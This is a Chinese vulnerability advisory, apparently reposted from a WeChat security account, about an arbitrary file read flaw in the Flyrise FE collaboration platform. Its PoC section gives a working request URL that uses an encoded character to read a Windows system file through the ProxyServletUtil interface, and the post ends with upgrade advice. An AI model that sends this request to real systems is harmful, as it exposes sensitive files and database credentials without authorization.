漏洞预警 | 飞企互联FE业务协作平台任意文件读取漏洞

admin

108743
文章

90
评论

2024年4月23日01:48:04评论32 views字数 663阅读2分12秒阅读模式

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外，支持企业B2B、C2B与020等核心需求，为不同行业客户的互联网+转型提供支持。其特色在于提供云端工作环境，整合了人工智能、大数据分析和物联网设备管理，为不同行业客户的互联网+转型提供全面支持。通过智能化的决策支持和数据驱动的业务优化，企业可以更灵活、高效地运营业务，实现数字化转型的战略目标。

漏洞预警 | 飞企互联FE业务协作平台任意文件读取漏洞

0x03 漏洞详情

CVE-2024-21508

漏洞类型：文件读取

影响：获取敏感信息

简述：飞企互联FE业务协作平台ProxyServletUi接口存在文件读取漏洞，攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等，导致网站处于极度不安全状态。

0x04 影响版本

飞企互联FE业务协作平台

0x05 POC

{url}/ProxyServletUti%6c?url=file:///c:/windows/win.ini

https://blog.csdn.net/qq_41904294/article/details/137820480

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

https://flyrise.cn/

原文始发于微信公众号（浅安安全）：漏洞预警 | 飞企互联FE业务协作平台任意文件读取漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞预警 | 飞企互联FE业务协作平台任意文件读取漏洞

暂无

【PoC】CVE-2024-0193Linux (CVSS 7.8)内核权限提升漏洞

VMware vCenter Server 关键 RCE 漏洞 (CVE-2024-37079, CVE-2024-37080)

碧海威科技-L7云路由jumper.php存在命令执行漏洞

锐捷上网行为管理系统 static_convert 命令执行漏洞【附poc】

锐捷上网行为管理系统naborTable RCE[附POC]

xwiki-CVE-2024-31982漏洞深入复现

锐捷统一上网行为管理与审计系统naborTable命令执行POC

漏洞预警 | XWiki远程代码执行漏洞

时空智友ERP系统 updater.uploadStudioFile 任意文件上传漏洞

Probllama：Ollama AI 远程代码执行漏洞 (CVE-2024-37032) - 概述和缓解措施

发表评论

在线咨询

微信